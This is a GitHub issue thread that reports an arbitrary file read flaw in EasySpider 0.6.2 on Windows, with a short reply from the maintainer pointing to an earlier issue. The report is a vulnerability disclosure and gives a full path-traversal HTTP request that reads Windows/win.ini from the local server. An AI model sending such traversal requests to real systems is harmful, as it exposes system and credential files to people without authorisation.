### ISSUE TITLE
EasySpider Version 0.6.2 Windows 存在任意文件读取漏洞

### ISSUE THREAD

**Issue by ewfubwefwe** [NaiboWang/EasySpider#504]
GET /../../../../../../../../../Windows/win.ini HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: localhost:8074

![image](https://github.com/user-attachments/assets/8c7dae76-9f8e-43b4-9309-d878ded8f61d)
![image](https://github.com/user-attachments/assets/a955c2a7-2186-4309-b442-0f5e92453eea)

**Comment by NaiboWang** [comment]
参考：https://github.com/NaiboWang/EasySpider/issues/466
